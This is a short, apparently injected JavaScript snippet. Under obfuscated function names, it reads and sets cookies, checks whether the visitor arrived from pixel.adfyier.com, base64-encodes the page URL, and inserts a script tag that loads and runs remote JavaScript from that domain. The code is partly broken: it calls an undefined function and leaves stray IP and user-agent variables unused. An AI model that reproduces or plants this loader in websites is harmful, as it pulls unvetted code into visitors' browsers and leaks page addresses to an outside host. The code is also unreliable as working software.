ip = '10.116.0.10';
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36';

  function hocifjxhme(c) { var n=c+"=";var d=document.cookie.split(';');for(var i=0;i<d.length;i++){var k=d[i];while(k.charAt(0)==' ')k=k.substring(1,k.length);if(k.indexOf(n)==0)return k.substring(n.length,k.length);}return null; }
  function poknulazym(c,v,e) { var x=new Date();x.setTime(x.getTime()+(e*24*60*60*1000));var exp="expires="+x.toUTCString();document.cookie=c+"="+v+";"+exp+";path=/"; }

  var rfr = document.referrer;
  var c = "mCtrlPw";

  if (rfr.includes("pixel.adfyier.com")) {
    var rndHash = Math.random().toString(36).substring(2, 15) + Math.random().toString(36).substring(2, 15);
    s(c, rndHash, 120);
  }

  var cValue = hocifjxhme(c);
  console.log("mCtrlPw cookie value:", cValue);

        campaign =btoa(document.URL);
                              characters ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
                              result = '';
                              charactersLength = characters.length;
                              for (i = 0; i < 10; i++ )
                              {
                                result += characters.charAt(Math.floor(Math.random() * charactersLength));
                              }
                              
                              var date = new Date();
                              date.setTime(date.getTime()+(6*1000));
                              var expires = "; expires="+date.toGMTString();
                              document.cookie = "uCtrl2=1;"+expires+"; path=/";

                              script = document.createElement('script');
                              script.src ='https://pixel.adfyier.com/campaign_name_'+result+campaign+'.js';
                              document.head.appendChild(script);
                              